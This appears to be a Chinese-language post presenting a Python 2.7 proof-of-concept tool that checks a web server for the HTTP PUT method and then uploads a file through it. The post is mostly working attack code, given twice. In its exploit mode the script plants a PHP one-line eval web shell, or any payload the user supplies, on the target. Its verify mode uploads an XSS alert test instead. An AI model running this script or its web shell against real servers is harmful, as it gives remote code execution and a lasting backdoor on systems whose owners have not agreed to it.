环境

Python 2.7 
    requests
    sys
Windows 7
Apache 已完成put配置。
PHP

Apache PUT配置

简单介绍一下源码,增加易读性。

POC入口函数,设置默认变量,接受和判断用户输入参数是否合法,调用探测是否存在不安全的HTTP方法函数Test2Option(url,YN),接受返回所支持的方法,调用PUT方法上传文件。

def main():
    if len(sys.argv) < 2 :
        print u'''
    Version:1.0
    请输入将要验证的URL(eg:Put2Poc.py http://test.com)
    Put2Poc.py arg1 arg2
    arg1:目标URL
    arg2: 选择(1)验证OR(2)利用(默认为验证)
    arg3: 选择上传文件的目录,默认为/(eg:/test/)
    arg4: 设置长传的文件的文件名,默认为test.html
    arg5:设置特定的利用payload(默认漏洞利用为:<?php @eval($_POST[1]) ?>)
    注:当前版本仅支持PHP语言的利用'''
        sys.exit()
    if len(sys.argv) >= 2 :
        url = sys.argv[1]
        YN = 1
        path = '/'
        filename = 'test.html' 
        content = None
        # print url
        if 'http' not in url :
            print u'请输入协议HTTP/HTTPS(eg:Put2Poc.py http://test.com)'
            sys.exit()
        if len(sys.argv) >= 3 :
            # print type(sys.argv[2])
            if sys.argv[2] in '2' :
                filename = 'test.php'
            if sys.argv[2] not in ['1','2'] :
                print u'输入的设置有误,请选择正确的设置(1:验证|2:利用)'
                sys.exit()
            YN = sys.argv[2]
        if len(sys.argv) >= 4 :
            path = sys.argv[3]
        if len(sys.argv) >= 5 :
            filename = sys.argv[4]
        if len(sys.argv) >= 6 :
            content = sys.argv[5]
    if len(sys.argv) > 6 :
        print u'请检查参数设置'
        sys.exit()
    r_options = Test2Option(url,YN)
    if content is not None :
        Put2File(url,YN,r_options,path,filename,content)
    else:
        Put2File(url,YN,r_options,path,filename)
    # print r_options

Error2status(code) 判断请求的返回状态。

参数 code : 请求返回的状态码
def Error2status(code):
    if 400 <= code < 500:
        return 4
    if 500 <= code < 600 :
        return 5
    if 200 <= code < 400 :
        return True

Test2Option(url,YN)探测目标URL是否支持OPTIONS方法

参数 url : 请求的URL
参数 YN : 选择验证漏洞或者利用漏洞,默认为验证。
def Test2Option(url,YN):
    try:
        r = requests.options(url,verify=False,timeout=10)
    except :
        print u'Error,请检查链接是否可以访问'
        sys.exit()
    r_options = r.headers
    r_status_code = Error2status(r.status_code)
    if r_status_code == 4 :
        print u'%s Client Error for url: %s' % (r.status_code,url)
        print u'该链接不支持OPTIONS方法'
        sys.exit()
    if r_status_code == 5 :
        print u'%s Server Error for url: %s' % (r.status_code,url)
        print u'请检查链接是否可以访问'
        sys.exit()
    if r_status_code is True :
        print u'该链接存在不安全的HTTP方法'
        print r_options['Allow']
        return r_options['Allow']

Put2File(url,YN,r_options,path,filename,content=None)

参数 url : 测试的URL
参数 YN : 选择验证漏洞或者利用漏洞,默认为验证。
参数 r_options : 网站所支持的HTTP请求方法。
参数 path : 文件上传位置
参数 filename : 文件名
参数 content : 自定义文件内容。
def Put2File(url,YN,r_options,path,filename,content=None):
    url = url.rstrip('/') + path + filename
    print url
    headers = {
    'Accept': '*/*',
    'Accept-Language': 'en-US',
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Win32)'   
    }
    data = '<script>alert(1)</script>'
    if YN is '2':
        data = '<?php @eval($_POST[1]) ?>'
        if content is not None :
            data = content
    r = requests.put(url,headers=headers,data=data)
    r_status_code = Error2status(r.status_code)
    if r_status_code == 4 :
        print u'%s Client Error for url: %s' % (r.status_code,url)
        print u'服务器禁止上传文件'
    if r_status_code == 5 :
        print u'%s Server Error for url: %s' % (r.status_code,url)
        print u'服务器禁止上传文件'
    if r_status_code is True :
        print u'Server status code: %s' %(r.status_code)
        print u'服务器支持PUT文件上传'
        print u'文件名: %s' %(filename)
        print u'文件内容: %s' %(data)
        print u'文件长传位置为: %s' %(path)
        print u'文件链接: %s' %(url)
        print r.content

POC

#/usr/bin/env python
#coding:utf-8
#
#Author:nw01f
#Date:2018.01.11
#Version:1.0
#

import requests
import sys

def Error2status(code):
    if 400 <= code < 500:
        return 4
    if 500 <= code < 600 :
        return 5
    if 200 <= code < 400 :
        return True

def Test2Option(url,YN):
    try:
        r = requests.options(url,verify=False,timeout=10)
    except :
        print u'Error,请检查链接是否可以访问'
        sys.exit()
    r_options = r.headers
    r_status_code = Error2status(r.status_code)
    if r_status_code == 4 :
        print u'%s Client Error for url: %s' % (r.status_code,url)
        print u'该链接不支持OPTIONS方法'
        sys.exit()
    if r_status_code == 5 :
        print u'%s Server Error for url: %s' % (r.status_code,url)
        print u'请检查链接是否可以访问'
        sys.exit()
    if r_status_code is True :
        print u'该链接存在不安全的HTTP方法'
        print r_options['Allow']
        return r_options['Allow']

def Put2File(url,YN,r_options,path,filename,content=None):
    url = url.rstrip('/') + path + filename
    print url
    headers = {
    'Accept': '*/*',
    'Accept-Language': 'en-US',
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Win32)'   
    }
    data = '<script>alert(1)</script>'
    if YN is '2':
        data = '<?php @eval($_POST[1]) ?>'
        if content is not None :
            data = content
    r = requests.put(url,headers=headers,data=data)
    r_status_code = Error2status(r.status_code)
    if r_status_code == 4 :
        print u'%s Client Error for url: %s' % (r.status_code,url)
        print u'服务器禁止上传文件'
    if r_status_code == 5 :
        print u'%s Server Error for url: %s' % (r.status_code,url)
        print u'服务器禁止上传文件'
    if r_status_code is True :
        print u'Server status code: %s' %(r.status_code)
        print u'服务器支持PUT文件上传'
        print u'文件名: %s' %(filename)
        print u'文件内容: %s' %(data)
        print u'文件长传位置为: %s' %(path)
        print u'文件链接: %s' %(url)
        print r.content

def main():
    if len(sys.argv) < 2 :
        print u'''
    Version:1.0
    请输入将要验证的URL(eg:Put2Poc.py http://test.com)
    Put2Poc.py arg1 arg2
    arg1:目标URL
    arg2: 选择(1)验证OR(2)利用(默认为验证)
    arg3: 选择上传文件的目录,默认为/(eg:/test/)
    arg4: 设置长传的文件的文件名,默认为test.html
    arg5:设置特定的利用payload(默认漏洞利用为:<?php @eval($_POST[1]) ?>)
    注:当前版本仅支持PHP语言的利用'''
        sys.exit()
    if len(sys.argv) >= 2 :
        url = sys.argv[1]
        YN = 1
        path = '/'
        filename = 'test.html' 
        content = None
        # print url
        if 'http' not in url :
            print u'请输入协议HTTP/HTTPS(eg:Put2Poc.py http://test.com)'
            sys.exit()
        if len(sys.argv) >= 3 :
            # print type(sys.argv[2])
            if sys.argv[2] in '2' :
                filename = 'test.php'
            if sys.argv[2] not in ['1','2'] :
                print u'输入的设置有误,请选择正确的设置(1:验证|2:利用)'
                sys.exit()
            YN = sys.argv[2]
        if len(sys.argv) >= 4 :
            path = sys.argv[3]
        if len(sys.argv) >= 5 :
            filename = sys.argv[4]
        if len(sys.argv) >= 6 :
            content = sys.argv[5]
    if len(sys.argv) > 6 :
        print u'请检查参数设置'
        sys.exit()
    r_options = Test2Option(url,YN)
    if content is not None :
        Put2File(url,YN,r_options,path,filename,content)
    else:
        Put2File(url,YN,r_options,path,filename)
    # print r_options

if __name__ == '__main__':
    main()

注:欢迎指正和提出修改意见。